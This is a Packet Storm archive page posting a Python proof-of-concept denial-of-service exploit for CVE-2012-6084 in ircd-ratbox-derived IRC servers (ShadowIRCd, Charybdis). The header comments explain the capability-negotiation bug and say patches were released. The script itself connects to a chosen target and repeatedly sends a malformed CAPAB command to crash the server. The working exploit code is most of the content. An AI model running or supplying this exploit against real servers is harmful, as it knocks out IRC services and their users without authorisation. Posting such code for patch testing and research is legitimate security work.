exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ratbox IRCd Denial Of Service

Ratbox IRCd Denial Of Service
Posted Jan 4, 2013
Authored by Aph3x, UberLame, O_O, Apetrick | Site zempirians.com

This exploit demonstrates a remotely trigger-able crash in ircd-ratbox version 2.0. It affects Shadowircd version 6.3.3 and Charybdis version 3.4.2.

tags | exploit
advisories | CVE-2012-6084
SHA-256 | 505feddc38f244f05e0a7faef634f09df484c9f17abd9e04dfc0e53aceb6f6ad

Ratbox IRCd Denial Of Service

Change Mirror Download
#!/usr/bin/python3
###################################################################################
#
# _ _ .__ .__
# __| || |_| | ____ ____ |__| ____ ____
# \ __ / | _/ __ \ / ___\| |/ _ \ / \
# | || || |_\ ___// /_/ > ( <_> ) | \ http://www.zempirians.com
# /_ ~~ _\____/\___ >___ /|__|\____/|___| /
# |_||_| \/_____/ \/
#
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
# Provided by: UberLame, Aph3x, Apetrick, O_O
#
###################################################################################
#
# -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-
#
# [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service
#
#
###################################################################################
# -=[ EXPLOIT ]=-
#
# Now that a patch has been secured we are releasing a proof of concept to test your
# ircd against this vulnerability. This exploit was designed to work against
# Shadowircd 6.3.3 running the following vulnerable code:
#
# +VULNERABLE+
# ../shadowircd/modules/m_capab.c - LINE(40)
# {{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}
#
# -=[ SUMMARY ]=-
#
# All versions of Charybdis are vulnerable to a remotely-triggered crash bug
# caused by code originating from ircd-ratbox 2.0. (Incidentally, this means all
# versions since ircd-ratbox 2.0 are also vulnerable.)
#
# The bug has to do with server capability negotiation. A malformed request will
# trigger a crash due to invalid assumptions.
#
# -=[ PATCH ]=-
#
# January 1, 2013 - 12:55 PM GMT-6
#
# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an
# integrated patch to resolve this issue. All admins should upgrade immediately.
#
# -=[ REFERENCE ]=-
#
# http://www.cvedetails.com/cve/CVE-2012-6084/
#
###################################################################################
# Ohai, I Can Has Moar Cycles? <33
#
# Eg: ./<file>.py -t <target> -p <port>
###################################################################################

from argparse import ArgumentParser
import socket


def own( uri, port ):
sock = socket.socket()
try:
ret = sock.connect_ex(( uri, int( port ) ))
except:
print( "\t[-] Failed To Connect To {}".format( uri ) )
exit()

print( "\t[+] Connected, Sending Payload To {}:{}".format( uri, port ) )
while True:
try:
sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a")
except socket.error as se:
print( '\t[!] Owned <3' )
break

sock.close()

if __name__ == '__main__':
parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )

parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' )
parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' )

args = parser.parse_args()

own( args.target, args.port )
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close